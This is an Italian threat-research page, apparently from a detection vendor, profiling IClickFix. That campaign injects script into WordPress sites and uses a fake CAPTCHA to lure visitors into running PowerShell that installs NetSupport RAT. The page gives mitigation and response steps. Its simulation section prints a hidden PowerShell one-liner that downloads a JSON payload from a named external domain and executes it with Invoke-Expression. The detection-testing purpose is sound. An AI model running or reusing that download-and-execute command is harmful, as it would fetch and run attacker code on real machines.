SOC Prime Bias: Medio

03 Feb 2026 18:25 UTC

Presentazione di IClickFix: un diffuso framework di attacco indirizzato a WordPress utilizzando la tattica ClickFix

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Segui
Presentazione di IClickFix: un diffuso framework di attacco indirizzato a WordPress utilizzando la tattica ClickFix
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Sommario

Il rapporto profila IClickFix, un framework JavaScript dannoso che compromette i siti WordPress e presenta un CAPTCHA contraffatto in stile Cloudflare Turnstile. L’esca costringe i visitatori ad eseguire un comando PowerShell che scarica e installa NetSupport RAT. La distribuzione è supportata da un sistema di distribuzione del traffico costruito attorno all’abbreviazione di URL YOURLS e da un insieme rotante di domini di reindirizzamento. I ricercatori hanno osservato più di 3.800 siti WordPress compromessi servire questa catena a livello globale dalla fine del 2024.

Indagine

Gli analisti di Sekoia hanno identificato il tag JavaScript iniettato ic-tracker-js nei siti compromessi, poi hanno ricostruito il flusso di reindirizzamento attraverso più domini di breve durata. Hanno catturato il modello esatto di esecuzione PowerShell utilizzato per recuperare il payload finale e recuperato i componenti NetSupport RAT rilasciati insieme agli indicatori dell’infrastruttura C2 associata.

Mitigazione

Monitorare i contenuti web per l’ ic-tracker-js iniezione e bloccare i domini dannosi noti, i reindirizzatori e i servizi di link brevi utilizzati nella catena. Sugli endpoint, rilevare schemi di download ed esecuzione PowerShell coerenti con l’esca ClickFix. Aggiungere copertura per la creazione di file client NetSupport e per la persistenza tramite chiavi Run del registro di livello utente.

Risposta

Quando emergono indicatori, isolare l’endpoint, fermare il processo PowerShell attivo e rimuovere i binari NetSupport più qualsiasi persistenza basata sul registro. Seguire con una triage forense completa per confermare che l’attaccante non abbia distribuito impianti aggiuntivi o stabilito percorsi di accesso secondari.

Flusso di Attacco

Esecuzione simulazione

Prerequisito: Il Telemetry & Baseline Pre‑flight Check deve essere passato.

  • Narrativa e Comandi dell’Attacco:

    Un avversario che ha accesso iniziale all’endpoint desidera stabilire una presenza persistente consegnando il NetSupport RAT. Per evitare il rilevamento interattivo, lanciano PowerShell in modalità nascosta senza profilo o logo (-w hidden -nop -c). Usano quindi Invoke‑WebRequest (iwr) per scaricare un payload JSON malevolo (tytuy.json) che contiene uno script PowerShell per il RAT. Lo script viene scritto nella directory temporanea ed eseguito tramite Invoke‑Expression. Questa riga di comando esatta corrisponde alle stringhe che la regola Sigma monitora.

  • Script di Test di Regressione:

    # Unica riga PowerShell che corrisponde alla regola di rilevamento
    $url = 'https://scottvmorton.com/tytuy.json'
    $out = "$env:TEMPpayload.ps1"
    
    powershell -w hidden -nop -c "iwr '$url' -OutFile $out; iex (Get-Content $out -Raw)"
  • Comandi di Pulizia:

    # Rimuovere il payload scaricato ed eventuali processi PowerShell residui
    Remove-Item -Path "$env:TEMPpayload.ps1" -ErrorAction SilentlyContinue
    Get-Process -Name powershell | Where-Object {$_.CommandLine -match 'tytuy.json'} | Stop-Process -Force